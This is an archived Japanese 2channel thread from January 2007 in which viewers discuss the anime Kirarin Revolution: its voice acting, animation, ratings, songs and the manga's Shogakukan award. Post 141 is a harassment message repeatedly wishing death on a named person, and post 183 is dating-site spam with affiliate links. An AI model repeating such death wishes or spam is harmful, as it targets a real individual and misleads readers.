129 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 22:39:48 ID:1qIhwho0
こないだ1回目以来見たんだけど
あの主人公の声かなりうまくなってるな
最初の抑揚のない棒読みと大分変わったよ

しかしなーさんすげえwww

130 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 01:53:11 ID:mJnpyTsH
今週はいよいよ千和の歌が聴けるな
ねこニャンダンスだったりしてw

131 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 06:48:56 ID:p2h/UDvL
>>87
あれ・・・原作にもあるエピソードだよ。

132 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 11:35:06 ID:tVzY+3Yy
http://www.banpresto.co.jp/japan/amuse/item/img/pz/44042_m.jpg
何このふざけたぬいぐるみ
きらりたんが別人にしか見えん

133 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 15:50:54 ID:jxfZfNuZ
ぬいぐるみじゃなくてフィギュア出してください

134 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 19:01:35 ID:yKWGygbV
>>132
全部かわいい!お持ち帰りぃ〜〜〜

135 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 22:05:06 ID:+fwhJzXN
589 :メロン名無しさん :2007/01/15(月) 21:57:25 ID:???0
365 名前:ミスターVR ◆OBrG.Nd2vU [] 投稿日:2007/01/15(月) 21:54:51 ID:8JrIwBsm0 ?2BP(0)
01月12日(金)
*3.6 18:00〜18:30 テレビ東京「きらりんレボリューション」

136 :風の谷の名無しさん@実況は実況板で:2007/01/16(火) 00:14:19 ID:ERYEwhp1
千和はねこにゃんじゃなくてネコミミモード

137 :風の谷の名無しさん@実況は実況板で:2007/01/16(火) 00:49:37 ID:iFbyxAyW
ま、ねこにゃんアニメにも出演はしてたけどな。

138 :風の谷の名無しさん@実況は実況板で:2007/01/16(火) 02:14:13 ID:UOouJ7yF
昨日初めて見ました。
なーさんって人がかわいいと思いました。


139 :風の谷の名無しさん@実況は実況板で:2007/01/16(火) 06:22:36 ID:ZNt7ay6M
人www

140 :風の谷の名無しさん@実況は実況板で:2007/01/16(火) 11:32:33 ID:TnKYsFs0
カメさんって人もかわいいよ♪

141 :木口 死ね:2007/01/16(火) 17:08:53 ID:WLp41Wf6
こんなこと書いてすいません
木口 死ね
慰謝料払え 払え 払え 払え 払え払え
死ね 死ね 死ね 死ね      

                 
                 
                 
                 
 
              



142 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 01:58:55 ID:E0smX270
SHIPSのアルバム作って欲しい!
セイジ君めちゃくちゃカコイイ(・∀・)

143 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 06:36:00 ID:wNQ2rTUc
学園祭や星野かすみの観客にやたらキモヲタがいたり、怪盗Xのヲタ芸とか見てると、
製作者が「アニヲタはさっさと死ねよ♪」って言ってるようにしか思えん。
なんでポケモンやハム太郎みたいな普通の子供向けじゃなくてこんなネタアニメにしたんだろ。
そして電波ギャグがなぜ子供に人気があるのかがわからない。
原作者は内心アニメ見てどう思ってるんだろう。

144 :fushianasan:2007/01/18(木) 23:30:33 ID:L3WKyyZR
>>143
ということは原作を読んで居るんですよね?
でもおかしいですねぇ、原作読んでいれば
この辺違和感感じないんですがね。マジで

145 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 17:19:31 ID:gBz3G7ms
いよいよ今日だ

146 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:16:27 ID:7dYHK/WI
あおいスゲーッ!!

147 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:22:27 ID:HA9++gDt
今回作画いいな
きらりさんが普通にかわいいじゃん

148 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:23:03 ID:Dr7qxYlb
>>143
だがそこがいい!

149 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:28:05 ID:XhjW4iPO
今日は久々に笑えた

150 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:29:51 ID:y4mebP7t
あおいのマネージャーが凄い邪悪顔
あおいの敵化フラグも立ってるし

151 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:29:59 ID:7HHHsK5k
チワワイカ

152 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:31:02 ID:+g458fMH
千和とのデュエットか…

153 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:31:09 ID:Eg8e8X4Q
最後に残った三人の中に細木数子がいなかった?

154 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:31:51 ID:pxnBuQuy
http://www.youtube.com/watch?v=V4Po-CxXnzg
バラライカ

155 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:36:27 ID:6US8rxtq
東山社長バロス

あとED変わったんだな
先週とその前見逃しちゃったからな〜

156 :◆Lu6.KIRARI :2007/01/19(金) 18:40:01 ID:cDaQtqnk
幼女番組なのに思いっきり大文字にお持ち帰りされたおばさんのその後が気になるw
つうか基本的に大文字以外いらんじゃねえか。
しかしあおいはエエなあ。もっと出番増やしてよエリナともども。

157 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:46:15 ID:j2uVRVyj
あおいスゴス
>>142
EDはカコイイとオモ
あとはアホの子(ry

158 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:46:56 ID:6US8rxtq
カレイドスターは見てて胃が痛くなりそうだから敬遠しちゃったけど
きらりさんはそんな心配が要らないのがいい

159 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:58:49 ID:l09E6/Ca
きりんがあおいちゃんに食べられちゃう!

160 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 19:00:40 ID:UInbh6d2
大文字の声が中村秀利じゃなかったな、体調でも崩したのか?
しかし今日は作画良かったな。

161 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 19:02:55 ID:aplVbPWO
この作品はほんと癒されるね。どうか末永く続いて欲しい。

162 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 19:03:57 ID:ublDjTKe
手抜きだし違和感の残る変な脚本だったけど、霧沢あおいのバラライカが聴けたからよしとしよう

163 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 19:12:24 ID:j2uVRVyj
前のバラライカと動きとか全然違うなw
前回の方がカクカクだった

164 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 19:21:45 ID:7UBhuRP6
ttp://sakuratan.ddo.jp/uploader/source/date31124.jpg

165 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 19:31:31 ID:cDaQtqnk
>>164
毎度乙。
SHIPSって暇なんだな。

166 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 19:34:42 ID:3l0EEqBq
年増園ってレベルじゃねえぞ

167 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 19:55:00 ID:7QmcW/2J
東山社長って美味しんぼの金上みたいだよな

168 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 19:58:21 ID:Qh0O6tiu
>>165
シップスは無職だからね。

169 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 20:00:12 ID:PgpLBrHu
SHIPSは超多忙できらりの何倍も仕事してるって設定はー?

170 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 20:34:45 ID:fDOHR/bG
あれ?シップス今日出てきたっけ?
あおいタンがバラライカ歌ってたのは記憶してるんだけど

171 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 20:43:49 ID:UInbh6d2
>>170
二人とも最初の方にちょろっと出てるぞ。
まあ俺もすっかり忘れてたけど。

172 :葉猫 ◆Jz.SaKuRaM :2007/01/19(金) 20:53:55 ID:IGG515JZ
最近、サブキャラが立ってきたな (・∀・)

173 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 20:59:55 ID:4Qu2GuUG
持田と嵐をもっと出してください><

きらりんのこと好きって公表してるんだから面白い展開に出来そう

174 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 21:06:29 ID:wcC9yKu0
CMのラストキモス
新手の妖怪か?!

175 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 22:35:56 ID:KabGE9L4

 ・・・先週分、録るの忘れてた(汗

勿体無いことした

176 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 01:15:52 ID:aUD1njTn
きらりの苗字って月島でしたっけ?

177 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 05:06:31 ID:uXx8j9IQ
月島さんと同じ、月島だよ。

178 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 05:14:21 ID:FF885ZSB
>>164
こうやってキャプ画で見ると、きらりさんの目のデカさは半端ないな

179 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 10:38:07 ID:uXx8j9IQ
顔の半分以上が目 だからな。

180 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 13:00:47 ID:aUD1njTn
>>179
>顔の半分以上が目

最近きらりさんが別の生き物に思えてきました。

181 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 13:19:10 ID:Tyqe9pz3
目が大きなところがきらりさんの魅力だろ

182 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 17:24:02 ID:ajJOWtmI
走ったら、ものすごくゴミとか虫が入りそうだな。

183 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 19:07:45 ID:5lX9XTi+
近くで出会える。速攻わくわくハッピー!!
http://www.happymail.co.jp/?af2094782
http://550909.com/?f5787804

184 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 19:13:06 ID:3TOEPOQR
>>173
2月に嵐メインの回やるよ

185 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 20:10:56 ID:wz9InM0i
>>184
嵐メインの話なんて初登場話以来か?
何時ぞやのエリナとのフラグは放置されっぱなしな訳だが、
いつか回収するのかねえ。

186 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 20:15:55 ID:hAxRMRaI
>>184
まじで!!!!!
やったー\(^o^)/

187 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 21:32:15 ID:87iQyAgC
嵐を登場させると海産物をムダにたくさん書かなきゃならないので
作画スタッフがあんまり出したがらないらしい、という噂を聞いたが

188 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 21:36:24 ID:g/G/WiXd
海産物ww

189 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 21:42:25 ID:UmbxguWd
>>187
どんな噂だよwwwww

190 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 00:55:07 ID:2gqfwBVc
これ見てる人間って
腐女子<アニオタ<モーオタ<リアルょぅι゙ょ
だよな?

191 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 01:14:41 ID:d4mp7WOb
>>190
OP目当てのゲイもいるぞw

192 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 01:33:33 ID:aJkrI1XD
ウッホ

193 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 07:04:57 ID:zybwbXSW
>>190
作者も見てるとおも

194 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 07:42:06 ID:zybwbXSW

小学館厨<腐女子<萌えオタ<アニオタ<ょぅι゙ょ のママ<モーオタ<リアルょぅι゙ょ

195 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 08:53:57 ID:Q7Ie5038
もしかしなくてもこのスレは男の人ばっかですか

196 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 08:57:57 ID:zybwbXSW
女性比率のほうが多いんじゃない?少女漫画なんだし

197 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 11:57:07 ID:53OuMZPU
あおいときらりじゃ役者が違うな
足元にも及ばないわ

198 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 12:00:19 ID:qS7/n4qA
今日は水着だった。(;´Д`)ハァハァ。

199 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 18:21:11 ID:VqxQFFpi
映画化はまだかヽ(`Д´)ノ

200 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 18:49:52 ID:j0v+V8tu
3年半続いて、ゴールデンタイムに放送されたミルモの映画化も無かったぐらいだから、期待出来そうにないな…


201 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 19:48:50 ID:55wgy6gc
いや、モー娘だし、ハム太郎の後釜だし、十分期待できるぞ

202 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 22:55:59 ID:VE76wq4l
ハム太郎にモー娘ときたらやっぱり映画だしな

203 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 23:50:33 ID:FOFF8FSb
456 ミスターVR ◆OBrG.Nd2vU New! 2007/01/22(月) 23:36:39 ID:ZKrX8s050 BE:?-2BP(0)
01/19(金)
*4.7 18:00〜18:30 テレビ東京「きらりんレボリューション」

204 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 23:52:39 ID:8Ug5QTaP
相変わらずすげーな

205 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 01:03:53 ID:2G9WS2p8
ゲイOPのおかげ。

206 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 04:53:22 ID:p9WWcYFX
もしかしてあおい効果なのか?
中の人はマニア向けアニメでは大人気らしいしw

>>200-201
ミルモは映画化されなかったのが今考えても不思議なくらいですね
ハム太郎の併映でやればよかったのに(怪獣王と組むよりはw)

207 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 09:02:31 ID:5811rjtg
バラライカって歌詞が意味不明だけど>>18はしっくりくるな・・

208 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 16:43:13 ID:1J5HwdDh
小学館漫画賞受賞おめ
http://www.shogakukan.co.jp/mangasho/

209 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 19:40:11 ID:pnRJXr8e
結局小学館漫画賞って売れたものに与えられるのね。
いやわかってたけどさ。

210 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 20:57:53 ID:aVNB3E4g
原作読んだことなかったけど結構評価されてる作品なんだ
っと思ったら7SEED’Sの受賞キタ━━━━(゚∀゚)━━━━!!!!
スレ違いだけどいつかくると思っていたら本当に来た
こういう勘は今までの経験でもよく当たる




だからキラレボも読んでおけばよかった

211 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 21:13:03 ID:Q5ckFmFb
>>210は読んだらゼッテー後悔する。

212 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:24:20 ID:q6oWYbTp
このアニメの原作ってプロ評価高かったんだな
けっこう技術のある先生なのかな一冊ぐらい読んでみよう
漫画を読んだりするとアニメ版とはまた違った雰囲気や味を楽しめたりするし

211はSFアクション系が好きな層には合わないってことか?

213 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:26:36 ID:fmA4s6pQ
きらりって、さん付けされるのはやっぱ尊敬されてるから?


214 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 03:20:01 ID:kbgr7BRf
技術的には決して高くない
絵も話も・・

215 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 09:54:04 ID:C63/QXvl
23 名前:名無し募集中。。。[] 投稿日:2007/01/22(月) 22:29:13.08 0
児童向け部門 『きらりん☆レボリューション』

普段はこの手の漫画が苦手な僕も、娘と一緒にアニメを見てまして(笑)
底抜けの明るさ、天真爛漫な主人公、それを見事に演じた久住小春ちゃん
アニメと漫画と実際のアイドルが見事に重ね合わさった見事な例だろう
アイドルと言う物語を通じて、女の子の成長を見事に書いた傑作

審査員 かわぐちかいじ

216 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 12:42:31 ID:f7HleXlL
ラブ×メガはEDにならんのかね

217 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 15:59:22 ID:bgs5lw34
>>215
・・・ネタだよな・・・?

218 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:40:27 ID:q6oWYbTp
>>215
それ漫画じゃなくてアニメの批評じゃん
小学館漫画賞はアニメの賞だったの?

219 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 21:54:21 ID:kbgr7BRf
結果が先に決まってるんだろうかって
勘繰りたくなるようなコメントですな

46 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)